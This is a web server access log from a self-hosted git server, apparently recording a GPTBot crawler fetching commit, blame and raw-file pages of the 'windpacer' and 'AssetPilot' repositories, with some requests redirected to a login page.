"/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10306] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16899] [Gzip 8.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 33095] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:16:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 25851] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:16:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10004] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10006] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11350] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10278] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 